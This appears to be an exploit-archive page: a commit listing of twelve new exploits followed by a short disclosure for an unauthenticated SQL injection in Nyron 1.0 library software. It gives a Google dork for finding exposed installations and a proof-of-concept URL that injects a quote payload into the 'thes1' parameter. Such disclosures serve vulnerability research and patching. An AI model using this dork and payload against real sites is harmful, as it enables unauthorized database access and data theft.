eb2b6f5cfd
12 changes to exploits/shellcodes WorkTime 10.20 Build 4967 - Unquoted Service Path Archeevo 5.0 - Local File Inclusion Online Resort Management System 1.0 - SQLi (Authenticated) OpenBMCS 2.4 - Cross Site Request Forgery (CSRF) OpenBMCS 2.4 - SQLi (Authenticated) OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated) OpenBMCS 2.4 - Information Disclosure Simple Chatbot Application 1.0 - Remote Code Execution (RCE) Simple Chatbot Application 1.0 - 'message' Blind SQLi Nyron 1.0 - SQLi (Unauthenticated) Creston Web Interface 1.0.0.2159 - Credential Disclosure
21 lines
No EOL
616 B
Text
21 lines
No EOL
616 B
Text
# Exploit Title: Nyron 1.0 - SQLi (Unauthenticated)
|
|
# Google Dork: inurl:"winlib.aspx"
|
|
# Date: 01/18/2021
|
|
# Exploit Author: Miguel Santareno
|
|
# Vendor Homepage: http://www.wecul.pt/
|
|
# Software Link: http://www.wecul.pt/solucoes/bibliotecas/
|
|
# Version: < 1.0
|
|
# Tested on: windows
|
|
|
|
# 1. Description
|
|
|
|
Unauthenticated user can exploit SQL Injection vulnerability in thes1 parameter.
|
|
|
|
|
|
# 2. Proof of Concept (PoC)
|
|
|
|
https://vulnerable_webiste.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='">
|
|
|
|
|
|
# 3. Research:
|
|
https://miguelsantareno.github.io/edp.pdf |